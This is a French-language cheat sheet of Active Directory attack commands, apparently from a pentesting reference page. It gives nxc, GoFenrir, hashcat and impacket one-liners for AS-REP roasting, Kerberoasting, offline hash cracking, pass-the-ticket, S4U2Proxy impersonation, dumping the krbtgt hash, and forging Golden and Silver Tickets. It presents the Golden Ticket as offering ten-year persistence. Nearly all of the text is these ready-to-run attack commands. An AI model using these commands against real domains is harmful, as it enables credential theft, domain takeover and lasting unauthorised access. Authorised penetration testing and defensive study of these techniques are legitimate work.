nxc ldap $DC -u '' -p '' --asreproast /tmp/asrep.txtDescription: AS-REP roasting sans creds si null session dispo : identifie les comptes sans pré-auth.
Exploitation
AS-REP, Kerberoasting, Pass-the-Ticket et tickets forgés pour escalade ou persistance.
nxc ldap $DC -u '' -p '' --asreproast /tmp/asrep.txtDescription: AS-REP roasting sans creds si null session dispo : identifie les comptes sans pré-auth.
nxc ldap $DC -u $USER -p $PASS --asreproast /tmp/asrep.txtDescription: Collecte AS-REP avec creds : plus fiable, tous les comptes vulnérables remontés.
gf ldap -t $DC -u $USER -p $PASS --asreproastDescription: Alternative GoFenrir : même résultat, format identique pour hashcat.
hashcat -m 18200 /tmp/asrep.txt $WORDLISTDescription: Crack offline des hash AS-REP (mode 18200 = Kerberos 5 AS-REP etype 23).
nxc ldap $DC -u $USER -p $PASS --kerberoasting /tmp/kerb.txtDescription: Extraire les TGS de tous les comptes avec SPN : crack offline vers mot de passe en clair.
gf ldap -t $DC -u $USER -p $PASS --kerberoastableDescription: Lister les comptes SPN sans les extraire, pour triage avant action.
hashcat -m 13100 /tmp/kerb.txt $WORDLISTDescription: Crack TGS RC4-HMAC (mode 13100). Préférer cibler les comptes de service métier.
hashcat -m 19700 /tmp/kerb.txt $WORDLISTDescription: Mode 19700 pour TGS AES256 si RC4 désactivé sur le compte.
getTGT.py $DOMAIN/$USER:$PASSDescription: Obtenir un TGT valide pour l'utilisateur courant via impacket.
export KRB5CCNAME=$USER.ccacheDescription: Définir le ticket actif dans la variable d'env pour les outils impacket et nxc.
nxc smb $TARGET -u $USER -p '' --use-kcacheDescription: Authentification Kerberos depuis le ccache : pas de hash ni de mot de passe envoyé.
getST.py -k -no-pass -impersonate Administrator -spn cifs/$TARGET.$DOMAIN $DOMAIN/$USER$:$PASSDescription: S4U2Proxy : impersonner un compte via un service account avec délégation.
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user krbtgtDescription: Extraire le hash krbtgt : requis pour forger un Golden Ticket (post-DA).
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN AdministratorDescription: Forger un Golden Ticket Administrator : valide 10 ans par défaut, persistance maximale.
secretsdump.py $DOMAIN/$USER:$PASS@$TARGET -just-dcDescription: Extraire le hash machine cible : nécessaire pour un Silver Ticket ciblé.
ticketer.py -nthash $MACHINE_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/$TARGET AdministratorDescription: Silver Ticket pour accès discret à un service précis sans passer par le KDC.